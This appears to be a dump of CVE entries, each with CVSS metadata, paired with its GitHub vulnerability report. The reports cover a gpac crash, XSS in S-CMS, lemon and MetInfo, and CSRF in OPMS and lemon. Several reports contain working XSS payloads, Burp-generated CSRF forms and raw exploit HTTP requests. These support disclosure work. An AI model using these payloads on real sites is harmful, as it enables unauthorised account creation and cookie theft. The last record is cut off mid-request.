[rax] 0x7ffff7aa5fb8 <svg_node_start+3128> mov rdi, qword ptr [rbp + 0x50] 0x7ffff7aa5fbc <svg_node_start+3132> mov edx, r15d 0x7ffff7aa5fbf <svg_node_start+3135> pxor xmm0, xmm0 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff5bb0 ◂— 0x0 01:0008│ 0x7fffffff5bb8 —▸ 0x5555555ce0d9 ◂— 'sceneUnit' 02:0010│ 0x7fffffff5bc0 ◂— 0x0 03:0018│ 0x7fffffff5bc8 ◂— 0x0 04:0020│ 0x7fffffff5bd0 —▸ 0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */ 05:0028│ 0x7fffffff5bd8 ◂— 0x0 06:0030│ 0x7fffffff5be0 ◂— 0x0 07:0038│ 0x7fffffff5be8 ◂— 0x3000000020 /* ' ' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7aa5f97 svg_node_start+3095 f 1 0x7ffff781fbc5 xml_sax_node_start+453 f 2 0x7ffff7820e6c xml_sax_parse+3596 f 3 0x7ffff78213d6 gf_xml_sax_parse_intern+950 f 4 0x7ffff7821595 gf_xml_sax_parse+165 f 5 0x7ffff7821633 xml_sax_read_file.part+115 f 6 0x7ffff7821927 gf_xml_sax_parse_file+295 f 7 0x7ffff7aa42da load_svg_run+58 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff781fbc5 in xml_sax_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7820e6c in xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff78213d6 in gf_xml_sax_parse_intern () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7821595 in gf_xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff7821633 in xml_sax_read_file.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff7821927 in gf_xml_sax_parse_file () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff7aa42da in load_svg_run () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00005555555844a8 in dump_isom_scene () #9 0x000055555557b42c in mp4boxMain () #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #11 0x000055555556c45e in _start () ```
Invalid memory address dereference in svg_node_start()
https://api.github.com/repos/gpac/gpac/issues/1965/comments
0
2021-12-10T10:59:40Z
2021-12-13T13:22:06Z
https://github.com/gpac/gpac/issues/1965
1,076,719,232
1,965
2,913
CVE-2020-20425
2021-12-22T23:15:07.453
S-CMS Government Station Building System v5.0 contains a cross-site scripting (XSS) vulnerability in the search function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://government.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sea0o/vulnerability/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.s-cms.cn/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "http://government.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sea0o/vulnerability/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.s-cms.cn/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:s-cms:s-cms:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "3797FECE-5F4C-4A17-B21E-15BE49A20B41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Sea0o/vulnerability/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Sea0o", "vulnerability" ]
打开首页 ![a](https://user-images.githubusercontent.com/48739932/66971619-852bb080-f0c4-11e9-97b0-47935f04a810.png) 点击政府建站系统得预览,进入预览网站 ![b](https://user-images.githubusercontent.com/48739932/66971664-ab515080-f0c4-11e9-8f4c-5cb006d19255.png) 其中搜索功能处存在xss,过滤了on事件,但是使用payload:"><svg/onload=alert(1)>成功弹窗 ![d](https://user-images.githubusercontent.com/48739932/66971723-e5225700-f0c4-11e9-9098-c6b6f229ba56.png) ![e](https://user-images.githubusercontent.com/48739932/66971728-e81d4780-f0c4-11e9-8d6b-9234eb3df6ae.png)
s-cms Government station building system exists XSS
https://api.github.com/repos/Str1am/vulnerability/issues/1/comments
0
2019-10-17T02:00:20Z
2019-10-17T02:00:20Z
https://github.com/Str1am/vulnerability/issues/1
508,187,386
1
2,914
CVE-2020-20426
2021-12-22T23:15:07.497
S-CMS Government Station Building System v5.0 contains a cross-site scripting (XSS) vulnerability in /function/booksave.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://government.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sea0o/vulnerability/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.s-cms.cn/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "http://government.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Sea0o/vulnerability/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.s-cms.cn/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:s-cms:s-cms:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "3797FECE-5F4C-4A17-B21E-15BE49A20B41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Sea0o/vulnerability/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Sea0o", "vulnerability" ]
in / function / booksave.php, ![1](https://user-images.githubusercontent.com/48739932/66975787-3422b900-f0d2-11e9-9d98-05582ce36e50.png) ![2](https://user-images.githubusercontent.com/48739932/66975790-36851300-f0d2-11e9-8738-76ecf4f8aec5.png) 只是简单得过滤了script,iframe,等标签,可以进行绕过 payload:http://127.0.0.1/CMS/scms//function/booksave.php POST:G_title="><svg/onload=alert(1)>&G_mail=heelo@qq.com&G_phone=18888888888 ![a](https://user-images.githubusercontent.com/48739932/66975942-a4c9d580-f0d2-11e9-9a14-24771fcd23a1.png) POST:G_name="><svg/onload=alert(1)>&G_mail=heelo@qq.com&G_phone=18888888888 ![b](https://user-images.githubusercontent.com/48739932/66975913-91b70580-f0d2-11e9-9c54-55e16d11bfbc.png) POST:G_msg="><svg/onload=alert(1)>&G_mail=heelo@qq.com&G_phone=18888888888 ![c](https://user-images.githubusercontent.com/48739932/66975920-967bb980-f0d2-11e9-9e09-79046391e0fc.png)
s-cms Multiple XSS exist in / function / booksave.php in Government station building system
https://api.github.com/repos/Str1am/vulnerability/issues/2/comments
0
2019-10-17T03:38:39Z
2019-10-17T03:38:39Z
https://github.com/Str1am/vulnerability/issues/2
508,214,246
2
2,915
CVE-2020-20595
2021-12-22T23:15:07.577
A cross-site request forgery (CSRF) in OPMS v1.3 and below allows attackers to arbitrarily add a user account via /user/add.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lock-upme/OPMS/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lock-upme/OPMS/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opms_project:opms:1.3:*:*:*:*:*:*:*", "matchCriteriaId": "0D2CC07B-3FCD-4240-B8B4-BEBBBD6B22FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/lock-upme/OPMS/issues/25
[ "Exploit", "Third Party Advisory" ]
github.com
[ "lock-upme", "OPMS" ]
Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, add a user CSRF Exp: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://opms.demo.milu365.cn/user/add" method="POST"> <input type="hidden" name="username" value="lisi" /> <input type="hidden" name="password" value="a1234567" /> <input type="hidden" name="depart" value="1462290164626094232" /> <input type="hidden" name="position" value="1462292006260420932" /> <input type="hidden" name="realname" value="lisi" /> <input type="hidden" name="sex" value="1" /> <input type="hidden" name="birth" value="2019&#45;10&#45;14" /> <input type="hidden" name="email" value="123&#64;qq&#46;com" /> <input type="hidden" name="webchat" value="" /> <input type="hidden" name="qq" value="" /> <input type="hidden" name="phone" value="13800138000" /> <input type="hidden" name="tel" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="emercontact" value="lxr" /> <input type="hidden" name="emerphone" value="13800138000" /> <input type="hidden" name="id" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user. ![image](https://user-images.githubusercontent.com/45255270/66762589-e0994b00-eed8-11e9-9a72-8cf9171f7e63.png) ![image](https://user-images.githubusercontent.com/45255270/66762611-e98a1c80-eed8-11e9-9fc8-d3e0bd58089a.png)
There is one CSRF vulnerability that can add the account
https://api.github.com/repos/lock-upme/OPMS/issues/25/comments
2
2019-10-14T15:18:42Z
2019-10-15T01:41:58Z
https://github.com/lock-upme/OPMS/issues/25
506,719,887
25
2,916
CVE-2020-20597
2021-12-22T23:15:07.613
A cross-site scripting (XSS) vulnerability in the potrtalItemName parameter in \web\PortalController.java of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuhuisheng/lemon/issues/198" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuhuisheng/lemon/issues/198" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mossle:lemon:1.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "DBB13DD5-1039-4C54-96F6-D30E344C3611", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xuhuisheng/lemon/issues/198
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuhuisheng", "lemon" ]
您好,我在lemon v1.10.0中编辑组件处发现存在存储型XSS **有效负荷:** <script>alert('cookie')</script> 文件名:src\main\java\com\mossle\portal\web\PortalController.java line : 96~151 代码: ``` @RequestMapping("save") public String save(@RequestParam(value = "id", required = false) Long id, @RequestParam("portalWidgetId") Long portalWidgetId, @RequestParam("portalItemName") String portalItemName) { String userId = currentUserHolder.getUserId(); PortalInfo portalInfo = this.copyOrGetPortalInfo(userId); PortalWidget portalWidget = portalWidgetManager.get(portalWidgetId); PortalItem portalItem = null; if (id == null) { portalItem = new PortalItem(); Integer columnIndex = (Integer) portalItemManager .findUnique( "select min(columnIndex) from PortalItem where portalInfo=?", portalInfo); if (columnIndex == null) { columnIndex = 0; } Long rowIndexLong = (Long) portalItemManager .findUnique( "select count(*) from PortalItem where portalInfo=? and columnIndex=?", portalInfo, columnIndex); if (rowIndexLong == null) { rowIndexLong = 0L; } int rowIndex = rowIndexLong.intValue(); portalItem.setColumnIndex(columnIndex); portalItem.setRowIndex(rowIndex); portalItem.setPortalInfo(portalInfo); } else { portalItem = this.createOrGetPortalItem(portalInfo, id); } portalItem.setName(portalItemName); portalItem.setPortalWidget(portalWidget); portalItemManager.save(portalItem); return "redirect:/portal/index.do"; } @RequestMapping("remove") public String remove(@RequestParam("id") Long id) { String userId = currentUserHolder.getUserId(); PortalInfo portalInfo = this.copyOrGetPortalInfo(userId); PortalItem portalItem = this.createOrGetPortalItem(portalInfo, id); portalItemManager.remove(portalItem); return "redirect:/portal/index.do"; } ``` 这里没有对portalItemName字段未进行过滤或者实体化编码导致可执行js代码 **利用:** 我发现portalItemName没有限制输出,进行构造有效负荷 **POC** ``` POST /portal/save.do HTTP/1.1 Host: www.mossle.com Content-Length: 94 Cache-Control: max-age=0 Origin: http://www.mossle.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://www.mossle.com/portal/index.do Accept-Encoding: gzip, deflate Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: SECURITY_LAST_TENANT=default; SECURITY_LAST_USERNAME=lingo; Hm_lvt_3b334d25157f3b6793cb191d399a31c3=1571068073,1571122763; SECURITY_DEVICE_ID=51a0590e-7936-4943-8efd-8f6c1fd966b5; SESSION=5d52a2af-654a-49e3-b49d-0347f684c056 Connection: close portalWidgetId=5557079130112&portalItemName=%3Cscript%3Ealert%28%27cookie%27%29%3C%2Fscript%3E ``` **结果:** 执行了js语句,并弹框 ![1571125431620](https://user-images.githubusercontent.com/45255270/66811694-1c2d2700-ef64-11e9-953d-3f0d7b10d884.png)
lemon 存在存储型XSS
https://api.github.com/repos/xuhuisheng/lemon/issues/198/comments
0
2019-10-15T07:55:26Z
2019-10-15T08:31:30Z
https://github.com/xuhuisheng/lemon/issues/198
507,071,847
198
2,917
CVE-2020-20598
2021-12-22T23:15:07.653
A cross-site scripting (XSS) vulnerability in the Editing component of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuhuisheng/lemon/issues/199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuhuisheng/lemon/issues/199" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mossle:lemon:1.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "DBB13DD5-1039-4C54-96F6-D30E344C3611", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xuhuisheng/lemon/issues/199
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuhuisheng", "lemon" ]
Product Homepage: http://www.mossle.com/index.do Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add. There is an xss in the place of Editing component ![1571127417546](https://user-images.githubusercontent.com/45255270/66828371-712c6580-ef83-11e9-8c0f-e7c0c666bcb2.png) We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie **Csrf Exp:** ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://www.mossle.com/portal/save.do" method="POST"> <input type="hidden" name="portalWidgetId" value="5557079425024" /> <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ![1571127847476](https://user-images.githubusercontent.com/45255270/66828450-a20c9a80-ef83-11e9-8435-86e98b273557.png)
Csrf + Xss combination Can be obtained user cookie
https://api.github.com/repos/xuhuisheng/lemon/issues/199/comments
0
2019-10-15T11:40:35Z
2019-10-15T17:10:02Z
https://github.com/xuhuisheng/lemon/issues/199
507,188,477
199
2,918
CVE-2020-20600
2021-12-22T23:15:07.690
MetInfo 7.0 beta contains a stored cross-site scripting (XSS) vulnerability in the $name parameter of admin/?n=column&c=index&a=doAddColumn.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alixiaowei/cve_test/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alixiaowei/cve_test/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "952CFCE9-04CC-478B-AE37-9CC18C6AAA02", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/alixiaowei/cve_test/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alixiaowei", "cve_test" ]
Vulnerability Name: Metinfo CMS stored XSS Vulnerability Product Homepage: https://www.metinfo.cn/ Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip Version: V7.0.0 beta Payload:```<script>alert('xss_test')</script>``` file path: MetInfo7.0.0beta\app\system\column\admin\index.class.php line: 118-268 code in line 125 ``` /** * 添加栏目 */ public function doAddColumn() { global $_M; $redata = array(); $name = $_M['form']['name']; $no_order = $_M['form']['no_order']; $big_class = $_M['form']['bigclass']; $foldername = $_M['form']['foldername']; $nav = $_M['form']['nav']; $module = $_M['form']['module']; $out_url = $_M['form']['out_url']; $index_num = $_M['form']['index_num']; $filename = $_M['form']['filename']; $if_in = $module ? 0 : 1; $res = self::_addColumn($name, $no_order, $module, $big_class, $foldername, $nav, $out_url, $index_num, $filename, $if_in); if ($res === true) { //写日志 logs::addAdminLog('admin_colunmmanage_v6','column_addcolumn_v6','jsok','doAddColumn'); buffer::clearColumn(); $redata['status'] = 1; $redata['msg'] = $_M['word']['jsok']; $this->ajaxReturn($redata); }else{ //写日志 logs::addAdminLog('admin_colunmmanage_v6','column_addcolumn_v6',$this->error[0],'doAddColumn'); $redata['msg'] = $this->error[0]; $redata['status'] = 0; $redata['error'] = $this->error; $this->ajaxReturn($redata); } } /** * 添加栏目 * @param string $name * @param string $no_order * @param string $module * @param string $big_class * @param string $foldername * @param string $nav * @param string $out_url * @param string $index_num * @param string $index_num * @param string $filename * @param int $if_in * @return bool */ private function _addColumn($name = '', $no_order = '', $module = '', $big_class = '', $foldername = '', $nav = '', $out_url = '', $index_num = '', $filename = '', $if_in = 0) { global $_M; $bigclass = $this->database->get_column_by_id($big_class); if ($bigclass) { $classtype = $bigclass['classtype'] + 1; $releclass = $bigclass['module'] == $module ? 0 : $big_class; } else { $classtype = 1; $releclass = 0; } if (!trim($name)) { //栏目名为空 $this->error[] = $_M['word']['column_descript1_v6']; return false; } if (preg_match("/[<\x{4e00}-\x{9fa5}>]+/u", $foldername)) { //中文目录 $this->error[] = $_M['word']['column_descript1_v6']; return false; } if (!is_simplestr($foldername, '/^[0-9A-Za-z_-]+$/') && $module != 0) { //中文目录 $this->error[] = $_M['word']['column_descript1_v6']; return false; } $mod = load::sys_class('handle', 'new')->file_to_mod($foldername); if ($mod && $mod != $module) { $this->error[] = $_M['word']['columndeffflor']; return false; } if ($filename) { $filenames = $this->database->get_column_by_filename($filename); if ($filenames) { $this->error[] = $_M['word']['jsx27']; return false; } } if ($bigclass['module'] == $module) { $sava_data['foldername'] = $bigclass['foldername']; } else { //验证模块是否可以用 if (!$if_in) { if (!$this->is_foldername_ok($foldername, $module)) { $this->error[] = $_M['word']['column_descript1_v6']; return false; } } $sava_data['foldername'] = $foldername; } $sava_data['name'] = $name; $sava_data['filename'] = ''; $sava_data['bigclass'] = $bigclass['id']; $sava_data['samefile'] = 0; $sava_data['module'] = $module; $sava_data['no_order'] = $no_order; $sava_data['wap_ok'] = 0; $sava_data['wap_nav_ok'] = 0; $sava_data['if_in'] = $if_in; $sava_data['nav'] = $nav; $sava_data['ctitle'] = ''; $sava_data['keywords'] = ''; $sava_data['content'] = ''; $sava_data['description'] = ''; $sava_data['list_order'] = 1; $sava_data['new_windows'] = 0; $sava_data['classtype'] = $classtype; //可以用bigclass计算得出 $sava_data['out_url'] = $if_in ? $out_url :''; $sava_data['index_num'] = $index_num; $sava_data['indeximg'] = ''; $sava_data['columnimg'] = ''; $sava_data['isshow'] = 1; $sava_data['lang'] = $_M['lang']; $sava_data['namemark'] = ''; $sava_data['releclass'] = $releclass; //可以用bigclass计算得出 $sava_data['display'] = 0; $sava_data['icon'] = ''; $sava_data['foldername'] = $if_in ? '' : $foldername; //数据入库 $id = $this->database->insert($sava_data); if ($id) { $this->columnCopyconfig($sava_data['foldername'], $sava_data['module'], $id); //更改管理员栏目权限 load::mod_class("admin/admin_op", 'new')->modify_admin_column_accsess($id); return true; } $this->error[] = 'Data error'; return false; } ``` Can see ```$name = $_M['form']['name']``` value, did some not filter, and judge some conditions after, and finally write ```$sava_data['name'] = $name; ```save to the database in **POC:** ``` POST /Metinfo/admin/?n=column&c=index&a=doAddColumn HTTP/1.1 Host: 192.168.174.136 Content-Length: 124 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://192.168.174.136 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.174.136/Metinfo/admin/ Accept-Encoding: gzip, deflate Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: deviceid=1571022073329; xinhu_ca_rempass=0; xinhu_mo_adminid=ru0tvv0mn0yn0ur0mt0rv0tvt0mm0tvv0mm0yr08; xinhu_ca_adminuser=wangj; Hm_lvt_520556228c0113270c0c772027905838=1571158913; PHPSESSID=40d2af28a4c309bbb824dc957af59b11; 